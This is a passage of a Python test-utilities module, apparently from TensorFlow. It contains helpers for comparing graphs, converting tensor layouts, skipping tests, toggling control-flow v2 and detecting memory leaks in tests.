# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=invalid-name
"""Test utils for tensorflow."""
import collections
from collections import OrderedDict
import contextlib
import functools
import gc
import itertools
import math
import os
import random
import re
import tempfile
import threading
import time
import unittest
from absl.testing import parameterized
import numpy as np
import six
from google.protobuf import descriptor_pool
from google.protobuf import text_format
from tensorflow.core.framework import graph_pb2
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.python import pywrap_sanitizers
from tensorflow.python import tf2
from tensorflow.python.client import device_lib
from tensorflow.python.client import pywrap_tf_session
from tensorflow.python.client import session
from tensorflow.python.compat.compat import forward_compatibility_horizon
from tensorflow.python.eager import backprop
from tensorflow.python.eager import context
from tensorflow.python.eager import def_function
from tensorflow.python.eager import tape
from tensorflow.python.framework import config
from tensorflow.python.framework import device as pydev
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import gpu_util
from tensorflow.python.framework import importer
from tensorflow.python.framework import indexed_slices
from tensorflow.python.framework import ops
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import tensor_util
from tensorflow.python.framework import tfrt_utils
from tensorflow.python.framework import versions
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_util
from tensorflow.python.ops import control_flow_util_v2
from tensorflow.python.ops import gradients_impl
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import script_ops
from tensorflow.python.ops import summary_ops_v2
from tensorflow.python.ops import variables
from tensorflow.python.ops.ragged import ragged_ops # pylint: disable=unused-import
from tensorflow.python.ops.ragged import ragged_tensor
from tensorflow.python.ops.ragged import ragged_tensor_value
from tensorflow.python.platform import _pywrap_stacktrace_handler
from tensorflow.python.platform import googletest
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import server_lib
from tensorflow.python.util import _pywrap_util_port
from tensorflow.python.util import compat
from tensorflow.python.util import deprecation
from tensorflow.python.util import nest
from tensorflow.python.util import tf_decorator
from tensorflow.python.util import tf_inspect
from tensorflow.python.util import traceback_utils
from tensorflow.python.util.compat import collections_abc
from tensorflow.python.util.protobuf import compare
from tensorflow.python.util.tf_export import tf_export
# If the below import is made available through the BUILD rule, then this
# function is overridden and will instead return True and cause Tensorflow
# graphs to be compiled with XLA.
def is_xla_enabled():
return False
try:
from tensorflow.python.framework.is_xla_test_true import is_xla_enabled # pylint: disable=g-import-not-at-top, unused-import
except Exception: # pylint: disable=broad-except
pass
# Uses the same mechanism as above to selectively enable/disable MLIR
# compilation.
def is_mlir_bridge_enabled():
return None
try:
from tensorflow.python.framework.is_mlir_bridge_test_false import is_mlir_bridge_enabled # pylint: disable=g-import-not-at-top, unused-import
except ImportError:
try:
from tensorflow.python.framework.is_mlir_bridge_test_true import is_mlir_bridge_enabled # pylint: disable=g-import-not-at-top, unused-import
except ImportError:
pass
def is_asan_enabled():
"""Check if ASAN is enabled."""
return pywrap_sanitizers.is_asan_enabled()
def is_msan_enabled():
"""Check if MSAN is enabled."""
return pywrap_sanitizers.is_msan_enabled()
def is_tsan_enabled():
"""Check if TSAN is enabled."""
return pywrap_sanitizers.is_tsan_enabled()
def is_ubsan_enabled():
"""Check if UBSAN is enabled."""
return pywrap_sanitizers.is_ubsan_enabled()
def _get_object_count_by_type(exclude=()):
return (
collections.Counter([type(obj).__name__ for obj in gc.get_objects()]) -
collections.Counter([type(obj).__name__ for obj in exclude]))
@tf_export("test.gpu_device_name")
def gpu_device_name():
"""Returns the name of a GPU device if available or a empty string.
This method should only be used in tests written with `tf.test.TestCase`.
>>> class MyTest(tf.test.TestCase):
...
... def test_add_on_gpu(self):
... if not tf.test.is_built_with_gpu_support():
... self.skipTest("test is only applicable on GPU")
...
... with tf.device(tf.test.gpu_device_name()):
... self.assertEqual(tf.math.add(1.0, 2.0), 3.0)
"""
for x in device_lib.list_local_devices():
if x.device_type == "GPU":
return compat.as_str(x.name)
return ""
def assert_ops_in_graph(expected_ops, graph):
"""Assert all expected operations are found.
Args:
expected_ops: `dict<string, string>` of op name to op type.
graph: Graph to check.
Returns:
`dict<string, node>` of node name to node.
Raises:
ValueError: If the expected ops are not present in the graph.
"""
actual_ops = {}
gd = graph.as_graph_def()
for node in gd.node:
if node.name in expected_ops:
if expected_ops[node.name] != node.op:
raise ValueError("Expected op for node %s is different. %s vs %s" %
(node.name, expected_ops[node.name], node.op))
actual_ops[node.name] = node
if set(expected_ops.keys()) != set(actual_ops.keys()):
raise ValueError("Not all expected ops are present. Expected %s, found %s" %
(expected_ops.keys(), actual_ops.keys()))
return actual_ops
@tf_export("test.assert_equal_graph_def", v1=[])
def assert_equal_graph_def_v2(expected, actual):
"""Asserts that two `GraphDef`s are (mostly) the same.
Compares two `GraphDef` protos for equality, ignoring versions and ordering of
nodes, attrs, and control inputs. Node names are used to match up nodes
between the graphs, so the naming of nodes must be consistent. This function
ignores randomized attribute values that may appear in V2 checkpoints.
Args:
expected: The `GraphDef` we expected.
actual: The `GraphDef` we have.
Raises:
AssertionError: If the `GraphDef`s do not match.
TypeError: If either argument is not a `GraphDef`.
"""
assert_equal_graph_def(actual, expected, checkpoint_v2=True,
hash_table_shared_name=True)
@tf_export(v1=["test.assert_equal_graph_def"])
def assert_equal_graph_def_v1(actual, expected, checkpoint_v2=False,
hash_table_shared_name=False):
"""Asserts that two `GraphDef`s are (mostly) the same.
Compares two `GraphDef` protos for equality, ignoring versions and ordering of
nodes, attrs, and control inputs. Node names are used to match up nodes
between the graphs, so the naming of nodes must be consistent.
Args:
actual: The `GraphDef` we have.
expected: The `GraphDef` we expected.
checkpoint_v2: boolean determining whether to ignore randomized attribute
values that appear in V2 checkpoints.
hash_table_shared_name: boolean determining whether to ignore randomized
shared_names that appear in HashTableV2 op defs.
Raises:
AssertionError: If the `GraphDef`s do not match.
TypeError: If either argument is not a `GraphDef`.
"""
assert_equal_graph_def(actual, expected, checkpoint_v2,
hash_table_shared_name)
def assert_equal_graph_def(actual, expected, checkpoint_v2=False,
hash_table_shared_name=False):
if not isinstance(actual, graph_pb2.GraphDef):
raise TypeError("Expected tf.GraphDef for actual, got %s" %
type(actual).__name__)
if not isinstance(expected, graph_pb2.GraphDef):
raise TypeError("Expected tf.GraphDef for expected, got %s" %
type(expected).__name__)
if checkpoint_v2:
_strip_checkpoint_v2_randomized(actual)
_strip_checkpoint_v2_randomized(expected)
if hash_table_shared_name:
_strip_hash_table_shared_name(actual)
_strip_hash_table_shared_name(expected)
diff = pywrap_tf_session.EqualGraphDefWrapper(actual.SerializeToString(),
expected.SerializeToString())
if diff:
raise AssertionError(compat.as_str(diff))
def assert_meta_graph_protos_equal(tester, a, b):
"""Compares MetaGraphDefs `a` and `b` in unit test class `tester`."""
# Carefully check the collection_defs
tester.assertEqual(set(a.collection_def), set(b.collection_def))
collection_keys = a.collection_def.keys()
for k in collection_keys:
a_value = a.collection_def[k]
b_value = b.collection_def[k]
proto_type = ops.get_collection_proto_type(k)
if proto_type:
a_proto = proto_type()
b_proto = proto_type()
# Number of entries in the collections is the same
tester.assertEqual(
len(a_value.bytes_list.value), len(b_value.bytes_list.value))
for (a_value_item, b_value_item) in zip(a_value.bytes_list.value,
b_value.bytes_list.value):
a_proto.ParseFromString(a_value_item)
b_proto.ParseFromString(b_value_item)
tester.assertProtoEquals(a_proto, b_proto)
else:
tester.assertEqual(a_value, b_value)
# Compared the fields directly, remove their raw values from the
# proto comparison below.
a.ClearField("collection_def")
b.ClearField("collection_def")
# Check the graph_defs.
assert_equal_graph_def(a.graph_def, b.graph_def, checkpoint_v2=True)
# Check graph_def versions (ignored by assert_equal_graph_def).
tester.assertProtoEquals(a.graph_def.versions, b.graph_def.versions)
# Compared the fields directly, remove their raw values from the
# proto comparison below.
a.ClearField("graph_def")
b.ClearField("graph_def")
tester.assertProtoEquals(a, b)
# Matches attributes named via _SHARDED_SUFFIX in
# tensorflow/python/training/saver.py
_SHARDED_SAVE_OP_PATTERN = "_temp_[0-9a-z]{32}/part"
def _strip_checkpoint_v2_randomized(graph_def):
for node in graph_def.node:
delete_keys = []
for attr_key in node.attr:
attr_tensor_value = node.attr[attr_key].tensor
if attr_tensor_value and len(attr_tensor_value.string_val) == 1:
attr_tensor_string_value = attr_tensor_value.string_val[0]
if (attr_tensor_string_value and
re.match(compat.as_bytes(_SHARDED_SAVE_OP_PATTERN),
attr_tensor_string_value)):
delete_keys.append(attr_key)
for attr_key in delete_keys:
del node.attr[attr_key]
_TABLE_SHARED_NAME_PATTERN = r"hash_table_[0-9a-z\-]+"
def _strip_hash_table_shared_name(graph_def):
for node in graph_def.node:
delete_keys = []
if node.op == "HashTableV2" and "shared_name" in node.attr:
if re.match(compat.as_bytes(_TABLE_SHARED_NAME_PATTERN),
node.attr["shared_name"].s):
delete_keys.append("shared_name")
for attr_key in delete_keys:
del node.attr[attr_key]
def IsGoogleCudaEnabled():
return _pywrap_util_port.IsGoogleCudaEnabled()
def IsBuiltWithROCm():
return _pywrap_util_port.IsBuiltWithROCm()
def IsBuiltWithXLA():
return _pywrap_util_port.IsBuiltWithXLA()
def IsBuiltWithNvcc():
return _pywrap_util_port.IsBuiltWithNvcc()
def GpuSupportsHalfMatMulAndConv():
return _pywrap_util_port.GpuSupportsHalfMatMulAndConv()
def IsMklEnabled():
return (_pywrap_util_port.IsMklEnabled() or
os.getenv("TF_ENABLE_ONEDNN_OPTS", "False").lower() in ["true", "1"])
def InstallStackTraceHandler():
_pywrap_stacktrace_handler.InstallStacktraceHandler()
def NHWCToNCHW(input_tensor):
"""Converts the input from the NHWC format to NCHW.
Args:
input_tensor: a 3-, 4-, or 5-D tensor, or an array representing shape
Returns:
converted tensor or shape array
"""
# tensor dim -> new axis order
new_axes = {3: [0, 2, 1], 4: [0, 3, 1, 2], 5: [0, 4, 1, 2, 3]}
if isinstance(input_tensor, ops.Tensor):
ndims = input_tensor.shape.ndims
return array_ops.transpose(input_tensor, new_axes[ndims])
else:
ndims = len(input_tensor)
return [input_tensor[a] for a in new_axes[ndims]]
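# Illustrative sketch (hypothetical helper, never called here): the pure
# shape-list behaviour of NHWCToNCHW. The channel dimension moves from last
# position to second position.
def _example_nhwc_to_nchw_shape():
  # A 4-D NHWC shape [N, H, W, C] becomes [N, C, H, W].
  assert NHWCToNCHW([2, 20, 30, 3]) == [2, 3, 20, 30]
  # A 5-D NDHWC shape is handled analogously.
  assert NHWCToNCHW([2, 4, 20, 30, 3]) == [2, 3, 4, 20, 30]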
def NHWCToNCHW_VECT_C(input_shape_or_tensor):
"""Transforms the input from the NHWC layout to NCHW_VECT_C layout.
Note: Does not include quantization or type conversion steps, which should
be applied afterwards.
Args:
input_shape_or_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
tensor or shape array transformed into NCHW_VECT_C
Raises:
ValueError: if last dimension of `input_shape_or_tensor` is not evenly
divisible by 4.
"""
permutations = {5: [0, 3, 1, 2, 4], 6: [0, 4, 1, 2, 3, 5]}
is_tensor = isinstance(input_shape_or_tensor, ops.Tensor)
temp_shape = (
input_shape_or_tensor.shape.as_list()
if is_tensor else input_shape_or_tensor)
if temp_shape[-1] % 4 != 0:
raise ValueError(
"Last dimension of input must be evenly divisible by 4 to convert to "
"NCHW_VECT_C.")
temp_shape[-1] //= 4
temp_shape.append(4)
permutation = permutations[len(temp_shape)]
if is_tensor:
t = array_ops.reshape(input_shape_or_tensor, temp_shape)
return array_ops.transpose(t, permutation)
else:
return [temp_shape[a] for a in permutation]
def NCHW_VECT_CToNHWC(input_shape_or_tensor):
"""Transforms the input from the NCHW_VECT_C layout to NHWC layout.
Note: Does not include de-quantization or type conversion steps, which should
be applied beforehand.
Args:
input_shape_or_tensor: a 5- or 6-D tensor, or an array representing shape
Returns:
tensor or shape array transformed into NHWC
Raises:
ValueError: if last dimension of `input_shape_or_tensor` is not 4.
"""
permutations = {5: [0, 2, 3, 1, 4], 6: [0, 2, 3, 4, 1, 5]}
is_tensor = isinstance(input_shape_or_tensor, ops.Tensor)
input_shape = (
input_shape_or_tensor.shape.as_list()
if is_tensor else input_shape_or_tensor)
if input_shape[-1] != 4:
raise ValueError("Last dimension of NCHW_VECT_C must be 4.")
permutation = permutations[len(input_shape)]
nhwc_shape = [input_shape[a] for a in permutation[:-1]]
nhwc_shape[-1] *= input_shape[-1]
if is_tensor:
t = array_ops.transpose(input_shape_or_tensor, permutation)
return array_ops.reshape(t, nhwc_shape)
else:
return nhwc_shape
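# Illustrative sketch (hypothetical helper, never called here): the two
# VECT_C shape conversions above are inverses of each other on shape lists,
# provided the channel count is divisible by 4.
def _example_vect_c_shape_round_trip():
  nhwc = [2, 20, 30, 8]
  # Channels are split into groups of 4: [N, H, W, C] -> [N, C // 4, H, W, 4].
  assert NHWCToNCHW_VECT_C(nhwc) == [2, 2, 20, 30, 4]
  # Converting back restores the original NHWC shape.
  assert NCHW_VECT_CToNHWC([2, 2, 20, 30, 4]) == nhwc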
def NCHWToNHWC(input_tensor):
"""Converts the input from the NCHW format to NHWC.
Args:
input_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
converted tensor or shape array
"""
# tensor dim -> new axis order
new_axes = {4: [0, 2, 3, 1], 5: [0, 2, 3, 4, 1]}
if isinstance(input_tensor, ops.Tensor):
ndims = input_tensor.shape.ndims
return array_ops.transpose(input_tensor, new_axes[ndims])
else:
ndims = len(input_tensor)
return [input_tensor[a] for a in new_axes[ndims]]
def skip_if(condition):
"""Skips the decorated function if condition is or evaluates to True.
Args:
condition: Either an expression that can be used in an "if not condition"
statement, or a callable whose result should be a boolean.
Returns:
The wrapped function
"""
def real_skip_if(fn):
def wrapper(*args, **kwargs):
if callable(condition):
skip = condition()
else:
skip = condition
if not skip:
return fn(*args, **kwargs)
return wrapper
return real_skip_if
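# Illustrative usage sketch (hypothetical test class, shown as a comment only):
# `skip_if` accepts either a boolean or a zero-argument callable, and the
# wrapped test body runs only when the condition is falsy at call time.
#
#   class MyTest(test.TestCase):
#
#     @skip_if(lambda: not is_gpu_available())
#     def testOnlyWhenGpuIsPresent(self):
#       ...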
@contextlib.contextmanager
def skip_if_error(test_obj, error_type, messages=None):
"""Context manager to skip cases not considered failures by the tests.
Note that this does not work if used in setUpClass/tearDownClass.
Usage in setUp/tearDown works fine just like regular test methods.
Args:
test_obj: A test object provided as `self` in the test methods; this object
is usually an instance of `unittest.TestCase`'s subclass and should have
`skipTest` method.
error_type: The error type to skip. Note that if `messages` are given, both
`error_type` and `messages` need to match for the test to be skipped.
messages: Optional, a string or list of strings. If `None`, the test will be
skipped if `error_type` matches what is raised; otherwise, the test is
skipped if any of the `messages` is contained in the message of the error
raised, and `error_type` matches the error raised.
Yields:
Nothing.
"""
if messages:
messages = nest.flatten(messages)
try:
yield
except error_type as e:
if not messages or any(message in str(e) for message in messages):
test_obj.skipTest("Skipping error: {}: {}".format(type(e), str(e)))
else:
raise
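# Illustrative usage sketch (hypothetical test method, shown as a comment
# only): skipping a test when a known-flaky error type is raised inside its
# body, optionally restricted to specific error messages.
#
#   def testMaybeFlaky(self):
#     with test_util.skip_if_error(self, errors.UnavailableError,
#                                  ["Connection reset", "Socket closed"]):
#       self._run_remote_query()  # hypothetical helper that may be flaky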
def enable_c_shapes(fn):
"""No-op. TODO(b/74620627): Remove this."""
return fn
def with_c_shapes(cls):
"""No-op. TODO(b/74620627): Remove this."""
return cls
def enable_control_flow_v2(fn):
"""Decorator for enabling CondV2 and WhileV2 on a test.
Note this enables using CondV2 and WhileV2 after running the test class's
setup/teardown methods.
In addition to this, callers must import the while_v2 module in order to set
the _while_v2 module in control_flow_ops.
Args:
fn: the function to be wrapped
Returns:
The wrapped function
"""
def wrapper(*args, **kwargs):
enable_control_flow_v2_old = control_flow_util.ENABLE_CONTROL_FLOW_V2
control_flow_util.ENABLE_CONTROL_FLOW_V2 = True
try:
return fn(*args, **kwargs)
finally:
control_flow_util.ENABLE_CONTROL_FLOW_V2 = enable_control_flow_v2_old
return wrapper
def with_control_flow_v2(cls):
"""Adds methods that call original methods with WhileV2 and CondV2 enabled.
Note this enables CondV2 and WhileV2 in new methods after running the test
class's setup method.
In addition to this, callers must import the while_v2 module in order to set
the _while_v2 module in control_flow_ops.
If a test function has _disable_control_flow_v2 attr set to True (using the
@disable_control_flow_v2 decorator), the v2 function is not generated for it.
Example:
@test_util.with_control_flow_v2
class ControlFlowTest(test.TestCase):
def testEnabledForV2(self):
...
@test_util.disable_control_flow_v2("b/xyzabc")
def testDisabledForV2(self):
...
Generated class:
class ControlFlowTest(test.TestCase):
def testEnabledForV2(self):
...
def testEnabledForV2WithControlFlowV2(self):
// Enable V2 flags.
testEnabledForV2(self)
// Restore V2 flags.
def testDisabledForV2(self):
...
Args:
cls: class to decorate
Returns:
cls with new test methods added
"""
if control_flow_util.ENABLE_CONTROL_FLOW_V2:
return cls
for name, value in cls.__dict__.copy().items():
if (callable(value) and
name.startswith(unittest.TestLoader.testMethodPrefix) and
not getattr(value, "_disable_control_flow_v2", False)):
setattr(cls, name + "WithControlFlowV2", enable_control_flow_v2(value))
return cls
def disable_control_flow_v2(unused_msg):
"""Decorator for a function in a with_control_flow_v2 enabled test class.
Blocks the function from being run with v2 control flow ops.
Args:
unused_msg: Reason for disabling.
Returns:
The wrapped function with _disable_control_flow_v2 attr set to True.
"""
def wrapper(func):
func._disable_control_flow_v2 = True
return func
return wrapper
def enable_output_all_intermediates(fn):
"""Force-enable outputing all intermediates from functional control flow ops.
Args:
fn: the function to be wrapped
Returns:
The wrapped function
"""
def wrapper(*args, **kwargs):
output_all_intermediates_old = \
control_flow_util_v2._EXPERIMENTAL_OUTPUT_ALL_INTERMEDIATES_OVERRIDE
control_flow_util_v2._EXPERIMENTAL_OUTPUT_ALL_INTERMEDIATES_OVERRIDE = True
try:
return fn(*args, **kwargs)
finally:
control_flow_util_v2._EXPERIMENTAL_OUTPUT_ALL_INTERMEDIATES_OVERRIDE = \
output_all_intermediates_old
return wrapper
def assert_no_new_pyobjects_executing_eagerly(func=None, warmup_iters=2):
"""Decorator for asserting that no new Python objects persist after a test.
Runs the test multiple times executing eagerly, first as a warmup and then to
let objects accumulate. The warmup helps ignore caches which do not grow as
the test is run repeatedly.
Useful for checking that there are no missing Py_DECREFs in the C code exercised by
a bit of Python.
Args:
func: The function to test.
warmup_iters: The number of warmup iterations, excluded from the measurement.
Returns:
The wrapped function performing the test.
"""
def wrap_f(f):
def decorator(self, *args, **kwargs):
"""Warms up, gets object counts, runs the test, checks for new objects."""
with context.eager_mode():
gc.disable()
# Run the test `warmup_iters` times as warmup, in an attempt to fill up
# caches, which should not grow as the test is run repeatedly below.
#
# TODO(b/117156879): Running warmup twice is black magic; we have seen
# tests that fail with 1 warmup run, and pass with 2, on various
# versions of python2.7.x.
for _ in range(warmup_iters):
f(self, *args, **kwargs)
# Since we aren't in the normal test lifecycle, we need to manually run
# cleanups to clear out their object references.
self.doCleanups()
# _get_object_count_by_type() itself creates some objects. Call it once here
# and keep the result as a baseline so that those objects are not later
# reported as leaks.
obj_count_by_type = _get_object_count_by_type()
gc.collect()
# Make sure any registered functions are cleaned up in the C++ runtime.
registered_function_names = context.context().list_function_names()
# unittest.doCleanups adds to self._outcome with each unwound call.
# These objects are retained across gc collections so we exclude them
# from the object count calculation.
obj_count_by_type = _get_object_count_by_type(
exclude=gc.get_referents(self._outcome.errors,
self._outcome.skipped))
if ops.has_default_graph():
collection_sizes_before = {
collection: len(ops.get_collection(collection))
for collection in ops.get_default_graph().collections
}
for _ in range(3):
f(self, *args, **kwargs)
# Since we aren't in the normal test lifecycle, we need to manually run
# cleanups to clear out their object references.
self.doCleanups()
# Note that gc.get_objects misses anything that isn't subject to garbage
# collection (C types). Collections are a common source of leaks, so we
# test for collection sizes explicitly.
if ops.has_default_graph():
for collection_key in ops.get_default_graph().collections:
collection = ops.get_collection(collection_key)
size_before = collection_sizes_before.get(collection_key, 0)
if len(collection) > size_before:
raise AssertionError(
("Collection %s increased in size from "
"%d to %d (current items %s).") %
(collection_key, size_before, len(collection), collection))
# Make sure our collection checks don't show up as leaked memory by
# removing references to temporary variables.
del collection
del collection_key
del size_before
del collection_sizes_before
gc.collect()
# There should be no new Python objects hanging around.
obj_count_by_type = (
_get_object_count_by_type(
exclude=gc.get_referents(self._outcome.errors,
self._outcome.skipped)) -
obj_count_by_type)
# There should be no newly registered functions hanging around.
leftover_functions = (
context.context().list_function_names() - registered_function_names)
assert not leftover_functions, (
"The following functions were newly created: %s" %
leftover_functions)
# In some cases (specifically on MacOS), the object count after the test run
# can somehow end up smaller than the baseline count.
# Using plain assert because not all classes using this decorator
# have assertLessEqual
assert not obj_count_by_type, (
"The following objects were newly created: %s" %
str(obj_count_by_type))
gc.enable()
return decorator
if func is None:
return wrap_f
else:
return wrap_f(func)
def assert_no_new_tensors(f):
"""Decorator for asserting that no new Tensors persist after a test.
Mainly useful for checking that code using the Python C API has correctly
manipulated reference counts.
Clears the caches that it knows about, runs the garbage collector, then checks
that there are no Tensor or Tensor-like objects still around. This includes
Tensors to which something still has a reference (e.g. from missing
Py_DECREFs) and uncollectable cycles (i.e. Python reference cycles where one
of the objects has __del__ defined).
Args:
f: The test case to run.
Returns:
The decorated test case.
"""
def decorator(self, **kwargs):
"""Finds existing Tensors, runs the test, checks for new Tensors."""
def _is_tensorflow_object(obj):
try:
return isinstance(obj,
(ops.Tensor, variables.Variable,
tensor_shape.Dimension, tensor_shape.TensorShape))
except (ReferenceError, AttributeError):
# If the object no longer exists, we don't care about it.
return False
tensors_before = set(
id(obj) for obj in gc.get_objects() if _is_tensorflow_object(obj))
outside_executed_eagerly = context.executing_eagerly()
# Run the test in a new graph so that collections get cleared when it's
# done, but inherit the graph key so optimizers behave.
outside_graph_key = ops.get_default_graph()._graph_key
with ops.Graph().as_default():
ops.get_default_graph()._graph_key = outside_graph_key
if outside_executed_eagerly:
with context.eager_mode():
result = f(self, **kwargs)
else:
result = f(self, **kwargs)
# Make an effort to clear caches, which would otherwise look like leaked
# Tensors.
context.context()._clear_caches() # pylint: disable=protected-access
gc.collect()
tensors_after = [
obj for obj in gc.get_objects()
if _is_tensorflow_object(obj) and id(obj) not in tensors_before
]
if tensors_after:
raise AssertionError(("%d Tensors not deallocated after test: %s" % (
len(tensors_after),
str(tensors_after),
)))
return result
return decorator
def _find_reference_cycle(objects, idx):
def get_ignore_reason(obj, denylist):
"""Tests whether an object should be omitted from the dependency graph."""
if len(denylist) > 100:
return "<depth limit>"
if tf_inspect.isframe(obj):
if "test_util.py" in tf_inspect.getframeinfo(obj)[0]:
return "<test code>"
for b in denylist:
if b is obj:
return "<test code>"
if obj is denylist:
return "<test code>"
return None
# Note: this function is meant to help with diagnostics. Its output is purely
# a human-readable representation, so you may freely modify it to suit your
# needs.
def describe(obj, denylist, leaves_only=False):
"""Returns a custom human-readable summary of obj.
Args:
obj: the value to describe.
denylist: same as denylist in get_ignore_reason.
leaves_only: boolean flag used when calling describe recursively. Useful
for summarizing collections.
"""
if get_ignore_reason(obj, denylist):
return "{}{}".format(get_ignore_reason(obj, denylist), type(obj))
if tf_inspect.isframe(obj):
return "frame: {}".format(tf_inspect.getframeinfo(obj))
elif tf_inspect.ismodule(obj):
return "module: {}".format(obj.__name__)
else:
if leaves_only:
return "{}, {}".format(type(obj), id(obj))
elif isinstance(obj, list):
return "list({}): {}".format(
id(obj), [describe(e, denylist, leaves_only=True) for e in obj])
elif isinstance(obj, tuple):
return "tuple({}): {}".format(
id(obj), [describe(e, denylist, leaves_only=True) for e in obj])
elif isinstance(obj, dict):
return "dict({}): {} keys".format(id(obj), len(obj.keys()))
elif tf_inspect.isfunction(obj):
return "function({}) {}; globals ID: {}".format(
id(obj), obj.__name__, id(obj.__globals__))
else:
return "{}, {}".format(type(obj), id(obj))
def build_ref_graph(obj, graph, reprs, denylist):
"""Builds a reference graph as <referrer> -> <list of referents>.
Args:
obj: The object to start from. The graph will be built by recursively
adding its referrers.
graph: Dict holding the graph to be built. To avoid creating extra
references, the graph holds object IDs rather than actual objects.
reprs: Auxiliary structure that maps object IDs to their human-readable
description.
denylist: List of objects to ignore.
"""
referrers = gc.get_referrers(obj)
denylist = denylist + (referrers,)
obj_id = id(obj)
for r in referrers:
if get_ignore_reason(r, denylist) is None:
r_id = id(r)
if r_id not in graph:
graph[r_id] = []
if obj_id not in graph[r_id]:
graph[r_id].append(obj_id)
build_ref_graph(r, graph, reprs, denylist)
reprs[r_id] = describe(r, denylist)
def find_cycle(el, graph, reprs, path):
"""Finds and prints a single cycle in the dependency graph."""
if el not in graph:
return
for r in graph[el]:
if r in path:
logging.error("Reference cycle sample:")
for p in path + (r,):
logging.error(reprs.get(p, "unknown object " + str(p)))
return True
else:
if find_cycle(r, graph, reprs, path + (r,)):
return True
return False
obj = objects[idx]
graph = {} # referrer ID -> object ID
reprs = {} # object ID -> description
build_ref_graph(obj, graph, reprs, (objects, graph, reprs, get_ignore_reason,
describe, build_ref_graph, find_cycle))
for k in graph:
if find_cycle(k, graph, reprs, ()):
return True
return False
def assert_no_garbage_created(f):
"""Test method decorator to assert that no garbage has been created.
Note that this decorator sets DEBUG_SAVEALL, which in some Python interpreters
cannot be un-set (i.e. will disable garbage collection for any other unit
tests in the same file/shard).
Args:
f: The function to decorate.
Returns:
The decorated function.
"""
def decorator(self, **kwargs):
"""Sets DEBUG_SAVEALL, runs the test, and checks for new garbage."""
# Force-load `distribution_strategy_context` to prevent GC at
# test time when using eager. Remove once b/117329403 is resolved.
tape.distribution_strategy_context.get_strategy()
gc.disable()
previous_debug_flags = gc.get_debug()
gc.set_debug(gc.DEBUG_SAVEALL)
gc.collect()
previous_garbage = len(gc.garbage)
result = f(self, **kwargs)
gc.collect()
new_garbage = len(gc.garbage)
if new_garbage > previous_garbage:
for i, obj in enumerate(gc.garbage[previous_garbage:]):
# Known false positive for ast.fix_missing_locations.
if getattr(obj, "__module__", "") == "ast":
new_garbage -= 3
if new_garbage > previous_garbage:
logging.error(
"The decorated test created work for Python's garbage collector, "
"likely due to a reference cycle. New objects in cycle(s):")
for i, obj in enumerate(gc.garbage[previous_garbage:]):
try:
logging.error("Object %d of %d", i,
len(gc.garbage) - previous_garbage)
def _safe_object_str(obj):
return "<%s %d>" % (obj.__class__.__name__, id(obj))
logging.error(" Object type: %s", _safe_object_str(obj))
logging.error(
" Referrer types: %s", ", ".join(
[_safe_object_str(ref) for ref in gc.get_referrers(obj)]))
logging.error(
" Referent types: %s", ", ".join(
[_safe_object_str(ref) for ref in gc.get_referents(obj)]))
logging.error(" Object attribute names: %s", dir(obj))
logging.error(" Object __str__:")
logging.error(obj)
logging.error(" Object __repr__:")
logging.error(repr(obj))
except Exception: # pylint: disable=broad-except
logging.error("(Exception while printing object)")
# When garbage is created, this call can help identify reference cycles,
# which are typically the cause of such garbage.
if new_garbage > previous_garbage:
for i in range(previous_garbage, new_garbage):
if _find_reference_cycle(gc.garbage, i):
break
# This will fail if any garbage has been created, typically because of a
# reference cycle.
self.assertEqual(previous_garbage, new_garbage)
# TODO(allenl): Figure out why this debug flag reset doesn't work. It would
# be nice to be able to decorate arbitrary tests in a large test suite and
# not hold on to every object in other tests.
gc.set_debug(previous_debug_flags)
gc.enable()
return result
return decorator
def _combine_named_parameters(**kwargs):
"""Generate combinations based on its keyword arguments.
Two sets of returned combinations can be concatenated using +. Their product
can be computed using `times()`.
Args:
**kwargs: keyword arguments of form `option=[possibilities, ...]` or
`option=the_only_possibility`.
Returns:
a list of dictionaries for each combination. Keys in the dictionaries are
the keyword argument names. Each key has one value - one of the
corresponding keyword argument values.
"""
sort_by_key = lambda k: k[0]
combinations = []
for key, values in sorted(kwargs.items(), key=sort_by_key):
if not isinstance(values, list):
values = [values]
combinations.append([(key, value) for value in values])
return [OrderedDict(result) for result in itertools.product(*combinations)]
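# Illustrative sketch (hypothetical helper, never called here): the
# combinations produced for two options, one of which is a plain scalar.
# Scalar option values are treated as single-element lists.
def _example_combine_named_parameters():
  combos = _combine_named_parameters(mode=["graph", "eager"], use_gpu=True)
  assert combos == [
      OrderedDict([("mode", "graph"), ("use_gpu", True)]),
      OrderedDict([("mode", "eager"), ("use_gpu", True)]),
  ]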
def generate_combinations_with_testcase_name(**kwargs):
"""Generate combinations based on its keyword arguments using combine().
This function calls combine() and appends a testcase name to the list of
dictionaries returned. The 'testcase_name' key is required for named
parameterized tests.
Args:
**kwargs: keyword arguments of form `option=[possibilities, ...]` or
`option=the_only_possibility`.
Returns:
a list of dictionaries for each combination. Keys in the dictionaries are
the keyword argument names. Each key has one value - one of the
corresponding keyword argument values.
"""
combinations = _combine_named_parameters(**kwargs)
named_combinations = []
for combination in combinations:
assert isinstance(combination, OrderedDict)
name = "".join([
"_{}_{}".format("".join(filter(str.isalnum, key)),
"".join(filter(str.isalnum, str(value))))
for key, value in combination.items()
])
named_combinations.append(
OrderedDict(
list(combination.items()) +
[("testcase_name", "_test{}".format(name))]))
return named_combinations
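# Illustrative sketch (hypothetical helper, never called here): each generated
# combination additionally carries a sanitized `testcase_name` entry suitable
# for `parameterized.named_parameters`.
def _example_generate_combinations_with_testcase_name():
  combos = generate_combinations_with_testcase_name(dtype=["float32", "int32"])
  assert [c["testcase_name"] for c in combos] == [
      "_test_dtype_float32", "_test_dtype_int32"
  ]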
def run_all_in_graph_and_eager_modes(cls):
